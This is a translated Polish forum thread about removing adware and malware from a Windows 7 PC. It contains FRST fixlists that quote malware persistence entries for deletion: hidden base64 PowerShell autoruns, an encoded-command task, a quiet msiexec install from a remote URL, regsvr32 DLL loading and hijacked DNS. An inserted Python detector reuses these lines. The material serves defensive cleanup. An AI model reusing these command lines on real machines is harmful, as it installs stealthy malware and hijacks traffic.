Hello,
I have a problem with my AVAST antivirus, which will not start; previously I had 360 Total Security, and MalwareBytes will not run either.
Earlier I had an infection during which wild ads and pages popped up, along with redirections from page to page; sometimes various strange porn pages appeared.
I have Windows 7 (64-bit)
OTL LOG: https://we.tl/bWdYI0CrIY
EXTRAS LOG: https://we.tl/10NvQ4UafQ
So far I have run AdwCleaner scans, of course with removal of the infected files; I also used ToolBarCleaner, but a few items will not delete:
https://we.tl/yuSFjh661U
Thanks in advance for the help
Atis (Atis), 4 November 2017 19:07, #2
Atis (Atis), 4 November 2017 19:36, #5
Uninstall:
mks_vir Skaner Online
Online Special Application
Online .io Application
Traffic Exchange
Paste into the system Notepad and save as a text file named fixlist:
CloseProcesses:
DeleteKey: HKCU\Software\Classes\jXMuXEbmYOGiUyr
HKU\S-1-5-19\...\RunOnce: [] => [X]
HKU\S-1-5-20\...\RunOnce: [] => [X]
HKU\S-1-5-21-1574067499-2952746644-996535552-1000\...\Run: [{3ACCDF78-177D-4F7E-B791-5A8CBB461693}] => powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\jXMuXEbmYOGiUyr').UANXLLCLC))); <==== UWAGA
HKU\S-1-5-18\...\Run: [] => [X]
HKU\S-1-5-18\...\RunOnce: [] => [X]
Tcpip\..\Interfaces\{117C177C-4E5C-4B5E-BAA9-C8CAF8279EF5}: [NameServer] 82.163.143.176 82.163.142.178
Tcpip\..\Interfaces\{1C1E6DCB-9C5C-4EAB-9A43-E894FD3694A8}: [NameServer] 82.163.143.176 82.163.142.178
Tcpip\..\Interfaces\{1C1E6DCB-9C5C-4EAB-9A43-E894FD3694A8}: [DhcpNameServer] 82.163.143.176
Tcpip\..\Interfaces\{3B5CB244-7C54-43A5-95B5-35C5B497B487}: [NameServer] 82.163.143.176 82.163.142.178
Tcpip\..\Interfaces\{51D21037-D82F-4CB8-9B2D-50F2EF7CB311}: [NameServer] 82.163.143.176 82.163.142.178
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Local Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page =
HKU\S-1-5-21-1574067499-2952746644-996535552-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.mystart.com/?pr=vmn&id=toolbarcleaner_ot&v=2_0&ent=hp_5288
Toolbar: HKU\S-1-5-21-1574067499-2952746644-996535552-1000 -> Brak nazwy - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - Brak pliku
CHR HomePage: ChromeDefaultData -> hxxp://www.luckysearch123.com?type=hp&ts=1493967308&from=d6440504&uid=samsungxssdx840xevox120gb_s1d5nsaf635635x&z=852aee7a9196ec63497161eg8zft1c0taq6m2c8eaw
CHR StartupUrls: ChromeDefaultData -> "hxxp://www.luckysearch123.com?type=hp&ts=1493967308&from=d6440504&uid=samsungxssdx840xevox120gb_s1d5nsaf635635x&z=852aee7a9196ec63497161eg8zft1c0taq6m2c8eaw"
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - hxxps://clients2.google.com/service/update2/crx
S3 KProcessHacker2; \??\C:\Program Files\kprocesshacker.sys [X]
S1 pndfwxab; \??\C:\Windows\system32\drivers\pndfwxab.sys [X]
U4 sr; Brak ImagePath
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
U2 WinSnare; Brak ImagePath
2017-11-04 19:07 - 2017-11-04 19:07 - 000000000 ____D C:\_OTL
2017-10-31 23:20 - 2017-11-04 19:01 - 000000000 ____D C:\AdwCleaner
2017-10-31 23:13 - 2017-03-07 22:45 - 000000000 ____D C:\Program Files (x86)\Spybot - Search & Destroy 2
2017-10-31 23:12 - 2017-03-07 22:45 - 000000000 ____D C:\ProgramData\Spybot - Search & Destroy
2017-10-30 23:04 - 2017-03-28 19:43 - 000000000 ____D C:\Program Files (x86)\Arefaphqugo
2017-10-25 17:26 - 2017-10-03 21:02 - 000000000 ____D C:\ProgramData\{80214C55-378A-FBFE-11C4-810FF900F12E}
C:\ProgramData\msjgd.exe
C:\ProgramData\mstiosu.exe
C:\Users\Maciek\bhdkriwsam.exe
C:\Users\Maciek\xkkhe.exe
CustomCLSID: HKU\S-1-5-21-1574067499-2952746644-996535552-1000_Classes\CLSID\{E68D0A55-3C40-4712-B90D-DCFA93FF2534}\InprocServer32 -> C:\Users\Maciek\AppData\Roaming\GG\ggdrive\ggdrive-menu.dll => Brak pliku
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> Brak pliku
ContextMenuHandlers1_S-1-5-21-1574067499-2952746644-996535552-1000: [GGDriveMenu] -> {E68D0A55-3C40-4712-B90D-DCFA93FF2534} => C:\Users\Maciek\AppData\Roaming\GG\ggdrive\ggdrive-menu.dll -> Brak pliku
ContextMenuHandlers4_S-1-5-21-1574067499-2952746644-996535552-1000: [GGDriveMenu] -> {E68D0A55-3C40-4712-B90D-DCFA93FF2534} => C:\Users\Maciek\AppData\Roaming\GG\ggdrive\ggdrive-menu.dll -> Brak pliku
ContextMenuHandlers5_S-1-5-21-1574067499-2952746644-996535552-1000: [GGDriveMenu] -> {E68D0A55-3C40-4712-B90D-DCFA93FF2534} => C:\Users\Maciek\AppData\Roaming\GG\ggdrive\ggdrive-menu.dll -> Brak pliku
Task: {291018B3-0FB6-49FA-8833-B85FFF0BF288} - System32\Tasks\{790D0A47-0478-090F-7911-057979041105} => C:\Windows\system32\WindowsPowershell\v1.0\powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand IAA7ACAAIAAgADsAOwA7ACAAIAA7ACAAOwA7ADsAOwA7ACAAIAAgADsAIAAgACAAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQA (dane wartości zawierają 10072 znaków więcej). <==== UWAGA
Task: {3713B4F4-37A6-4096-9162-B4CEA7C84957} - System32\Tasks\Traffic Exchange v209 - 1 => C:\Program Files (x86)\Microleaves\Traffic Exchange\Online-Guardian-v2.0.9.exe <==== UWAGA
C:\Program Files (x86)\Microleaves
Task: {39EE5D6E-259E-415A-80A2-7A1FBF00C70D} - System32\Tasks\Online Application v209 Guard => C:\Program Files (x86)\Microleaves\Online.io Application\Online-Guardian-v2.0.9.exe <==== UWAGA
Task: {5309A776-DF5C-49DA-80E3-9EDB3276FFCF} - System32\Tasks\Traffic Exchange v2 - 2 => C:\Program Files (x86)\Microleaves\Traffic Exchange\OnlineGuardian-v2.exe <==== UWAGA
Task: {64A23E38-A2E1-49EB-A4EB-C307C25054B9} - System32\Tasks\{A735371E-8FA6-E3EF-8DCA-E8754D29093D} => C:\Windows\system32\regsvr32.exe /s /n /i:"/rt" "C:\PROGRA~3\e8a7726c\e284e08f.dll" <==== UWAGA
Task: {6E7B8547-BF60-474D-ADA9-FCE501F71404} - System32\Tasks\Online Application v209 Guardian => C:\Program Files (x86)\Microleaves\Online.io Application\Online-Guardian-v2.0.9.exe <==== UWAGA
Task: {71D72DB4-9696-44E3-97E4-045539AB790B} - System32\Tasks\Ckoghtphadoward Cloud => C:\Program Files (x86)\Arefaphqugo\xprahule.exe [2017-03-28] (Glarysoft Ltd)
Task: {8ECBAECA-8073-4DEB-B349-C48CFE4463A5} - System32\Tasks\Traffic Exchange v2 - 3 => C:\Program Files (x86)\Microleaves\Traffic Exchange\OnlineGuardian-v2.exe <==== UWAGA
Task: {91217389-EEBA-44A9-8B8D-8A0C827E7713} - System32\Tasks\Traffic Exchange v209 - 2 => C:\Program Files (x86)\Microleaves\Traffic Exchange\Online-Guardian-v2.0.9.exe <==== UWAGA
Task: {EA48F3A1-841B-4ABE-A83E-FD82F86986BD} - System32\Tasks\Traffic Exchange v209 - 3 => C:\Program Files (x86)\Microleaves\Traffic Exchange\Online-Guardian-v2.0.9.exe <==== UWAGA
Task: {F6BBA712-F5C5-4A61-B2BF-9E09EBB1798D} - System32\Tasks\Traffic Exchange v2 - 1 => C:\Program Files (x86)\Microleaves\Traffic Exchange\OnlineGuardian-v2.exe <==== UWAGA
Task: {FBCFC366-C5D1-4F79-86FE-669911621C4D} - System32\Tasks\T0528 => "msiexec.exe" /i hxxp://point.chcyhqc.com/anzhaungoimism3.dat /q
Task: {FF66047B-99B1-4DB8-AB60-65AEA8BCCFF7} - System32\Tasks\Online Application v209 => C:\Program Files (x86)\Microleaves\Online.io Application\Online-Guardian-v2.0.9.exe <==== UWAGA
Task: C:\Windows\Tasks\Online Application v209 Guard.job => C:\Program Files (x86)\Microleaves\Online.io Application\Online-Guardian-v2.0.9.exe <==== UWAGA
Task: C:\Windows\Tasks\Online Application v209 Guardian.job => C:\Program Files (x86)\Microleaves\Online.io Application\Online-Guardian-v2.0.9.exe <==== UWAGA
Task: C:\Windows\Tasks\Online Application v209.job => C:\Program Files (x86)\Microleaves\Online.io Application\Online-Guardian-v2.0.9.exe <==== UWAGA
Task: C:\Windows\Tasks\Traffic Exchange v2 - 1.job => C:\Program Files (x86)\Microleaves\Traffic Exchange\OnlineGuardian-v2.exe <==== UWAGA
Task: C:\Windows\Tasks\Traffic Exchange v2 - 2.job => C:\Program Files (x86)\Microleaves\Traffic Exchange\OnlineGuardian-v2.exe <==== UWAGA
Task: C:\Windows\Tasks\Traffic Exchange v2 - 3.job => C:\Program Files (x86)\Microleaves\Traffic Exchange\OnlineGuardian-v2.exe <==== UWAGA
Task: C:\Windows\Tasks\Traffic Exchange v209 - 1.job => C:\Program Files (x86)\Microleaves\Traffic Exchange\Online-Guardian-v2.0.9.exe <==== UWAGA
Task: C:\Windows\Tasks\Traffic Exchange v209 - 2.job => C:\Program Files (x86)\Microleaves\Traffic Exchange\Online-Guardian-v2.0.9.exe <==== UWAGA
Task: C:\Windows\Tasks\Traffic Exchange v209 - 3.job => C:\Program Files (x86)\Microleaves\Traffic Exchange\Online-Guardian-v2.0.9.exe <==== UWAGA
Task: C:\Windows\Tasks\Updater_Online_Special_Application.job => C:\Program Files (x86)\Microleaves\Online Special Application\Online Special Application Updater.exe <==== UWAGA
EmptyTemp:
Run FRST and click Fix. Post the Fixlog removal report.
Click Scan and post a new FRST report, without Addition and Shortcut.
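As an added example (not part of this thread, and not FRST's own tooling), the Python script below applies the checks the helper applied by eye to the fixlist above, over FRST-style log lines copied from the thread plus one constructed benign resolver line: hidden or encoded PowerShell in Run values and scheduled tasks, public resolvers written into every network interface, msiexec installing from a URL, regsvr32 loading a DLL out of ProgramData, and a service whose binary lives in a user profile. The names `scan_frst_lines`, `Finding`, the `EXPECTED_DNS` allowlist and the two-indicator PowerShell threshold are assumptions of this example.

```python
"""Flag suspicious entries in FRST (Farbar Recovery Scan Tool) log lines.

Added example for this thread; not code from the posts or from FRST. It encodes
the judgement applied by eye to the fixlist: hidden/encoded PowerShell autoruns
and tasks, rewritten resolvers, LOLBin tasks and services run from a profile.
"""
import ipaddress
import re
from dataclasses import dataclass, field
from typing import List

# Assumption: resolvers this machine is expected to use. Private addresses
# (for instance a home router) are always accepted.
EXPECTED_DNS = {"8.8.8.8", "8.8.4.4"}

# One indicator per pattern; a PowerShell command line needs at least two to be
# reported, so a lone "-windowstyle hidden" maintenance script is not.
POWERSHELL_INDICATORS = {
    r"-executionpolicy\s+bypass": "execution policy bypass",
    r"-windowstyle\s+hidden": "hidden window",
    r"-encodedcommand": "encoded command",
    r"frombase64string": "inline base64 payload",
    r"\biex\b": "Invoke-Expression of generated text",
}


@dataclass
class Finding:
    category: str  # autorun | task | dns | service
    line: str
    reasons: List[str] = field(default_factory=list)


def _powershell_reasons(cmd: str) -> List[str]:
    low = cmd.lower()
    if "powershell" not in low:
        return []
    hits = [why for pat, why in POWERSHELL_INDICATORS.items() if re.search(pat, low)]
    return hits if len(hits) >= 2 else []


def _is_unexpected_dns(ip: str) -> bool:
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return not (addr.is_private or ip in EXPECTED_DNS)


def scan_frst_lines(text: str) -> List[Finding]:
    """Return one Finding per suspicious line; benign lines yield nothing."""
    findings: List[Finding] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        # 1. Autoruns (Run/RunOnce values) and scheduled tasks: inspect the command after "=>".
        if re.search(r"\\Run(Once)?:", line) or line.startswith("Task:"):
            cmd = line.split(" => ", 1)[1] if " => " in line else ""
            low = cmd.lower()
            reasons = _powershell_reasons(cmd)
            if "msiexec" in low and re.search(r'/i\s+"?(hxxp|http)s?://', low):
                reasons.append("msiexec installing a package from a remote URL")
            if "regsvr32" in low and "/i:" in low and re.search(r"progra~3|programdata", low):
                reasons.append("regsvr32 /i loading a DLL from ProgramData")
            if reasons:
                findings.append(Finding("task" if line.startswith("Task:") else "autorun", line, reasons))
            continue
        # 2. Per-interface DNS servers (static NameServer or DHCP-assigned).
        m = re.search(r"\[(?:Dhcp)?NameServer\]\s+(.*)$", line)
        if m:
            bad = [ip for ip in m.group(1).split() if _is_unexpected_dns(ip)]
            if bad:
                findings.append(Finding("dns", line, [f"unexpected resolver {ip}" for ip in bad]))
            continue
        # 3. Services/drivers (R/S/U prefix): binary in a profile, or the unsigned marker
        #    this (Polish-localized) FRST log uses.
        svc = re.match(r"^[RSU]\d\s+[^;]+;\s*(.*)$", line)
        if svc:
            rest, reasons = svc.group(1), []
            if re.search(r"\\users\\[^\\]+\\appdata\\", rest, re.I):
                reasons.append("service binary under a user profile")
            if "[Brak podpisu cyfrowego]" in rest:
                reasons.append("FRST reports no digital signature")
            if reasons:
                findings.append(Finding("service", line, reasons))
    return findings


# Lines copied from the fixlist in this thread, plus one constructed benign control
# (the 192.168.1.1 resolver) that must not be reported. The "Ckoghtphadoward Cloud"
# task is included to show that random-looking names need a separate heuristic.
SAMPLE_LOG = "\n".join([
    r"HKU\S-1-5-21-1574067499-2952746644-996535552-1000\...\Run: [{3ACCDF78-177D-4F7E-B791-5A8CBB461693}] => powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\jXMuXEbmYOGiUyr').UANXLLCLC)));",
    r"Tcpip\..\Interfaces\{117C177C-4E5C-4B5E-BAA9-C8CAF8279EF5}: [NameServer] 82.163.143.176 82.163.142.178",
    r"Tcpip\..\Interfaces\{1C1E6DCB-9C5C-4EAB-9A43-E894FD3694A8}: [DhcpNameServer] 82.163.143.176",
    r"Tcpip\..\Interfaces\{00000000-0000-0000-0000-000000000000}: [NameServer] 192.168.1.1",  # constructed
    r"Task: {291018B3-0FB6-49FA-8833-B85FFF0BF288} - System32\Tasks\{790D0A47-0478-090F-7911-057979041105} => C:\Windows\system32\WindowsPowershell\v1.0\powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand IAA7ACAAIAAgADsAOwA7ACAAIAA7ACAAOwA7ADsAOwA7ACAAIAAgADsA",
    r'Task: {64A23E38-A2E1-49EB-A4EB-C307C25054B9} - System32\Tasks\{A735371E-8FA6-E3EF-8DCA-E8754D29093D} => C:\Windows\system32\regsvr32.exe /s /n /i:"/rt" "C:\PROGRA~3\e8a7726c\e284e08f.dll"',
    r'Task: {FBCFC366-C5D1-4F79-86FE-669911621C4D} - System32\Tasks\T0528 => "msiexec.exe" /i hxxp://point.chcyhqc.com/anzhaungoimism3.dat /q',
    r"Task: {71D72DB4-9696-44E3-97E4-045539AB790B} - System32\Tasks\Ckoghtphadoward Cloud => C:\Program Files (x86)\Arefaphqugo\xprahule.exe [2017-03-28] (Glarysoft Ltd)",
    r"R2 VSSS; C:\Users\Maciek\AppData\Roaming\Microsoft\SystemCertificates\VSSVC.exe [99477824 2015-06-23] (Microsoft Corporation) [Brak podpisu cyfrowego]",
    r"S3 VGPU; System32\drivers\rdvgkmd.sys [X]",
])

if __name__ == "__main__":
    for f in scan_frst_lines(SAMPLE_LOG):
        print(f"[{f.category}] {'; '.join(f.reasons)}\n    {f.line[:100]}")
```

Run it as-is to see the seven findings from the sample; to use it on a real report, read FRST.txt into `scan_frst_lines` instead of `SAMPLE_LOG`. The two tuning points are the resolver allowlist and the two-indicator threshold for PowerShell; lowering the threshold to one catches more but will also report legitimate hidden-window scripts.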
Atis (Atis), 4 November 2017 22:00, #7
Paste into the system Notepad and save as a text file named fixlist:
CloseProcesses:
R2 VSSS; C:\Users\Maciek\AppData\Roaming\Microsoft\SystemCertificates\VSSVC.exe [99477824 2015-06-23] (Microsoft Corporation) [Brak podpisu cyfrowego] <==== UWAGA
C:\Users\Maciek\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\coobgpohoikkiipiblmjeljniedjpjpf
C:\Users\Maciek\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm
C:\Users\Maciek\AppData\Roaming\Microsoft\SystemCertificates\VSSVC.exe
2017-11-04 19:42 - 2017-11-04 20:50 - 000015360 ___SH C:\Users\Maciek\Desktop\Thumbs.db
2017-11-04 19:21 - 2017-11-04 19:28 - 000074166 _____ C:\Users\Maciek\Desktop\Extras.Txt
2017-11-04 19:20 - 2017-11-04 19:27 - 000372118 _____ C:\Users\Maciek\Desktop\OTL000000.Txt
2017-11-04 19:06 - 2017-11-04 19:06 - 000602112 _____ (OldTimer Tools) C:\Users\Maciek\Desktop\OTL.exe
2017-11-04 19:03 - 2017-11-04 19:03 - 000062342 _____ C:\Users\Maciek\Desktop\OTL1222.Txt
2017-11-04 13:42 - 2017-11-04 13:42 - 002114112 _____ C:\Users\Maciek\Desktop\mksosetup.exe
2017-11-04 13:42 - 2017-11-04 13:42 - 000001022 _____ C:\Users\Maciek\Desktop\mks_vir skaner online.lnk
2017-11-04 13:42 - 2017-11-04 13:42 - 000000000 ____D C:\ProgramData\mks_vir
DeleteQuarantine:
EmptyTemp:
Run FRST and click Fix. Post the Fixlog removal report.
Click Scan and post a new FRST report, without Addition and Shortcut.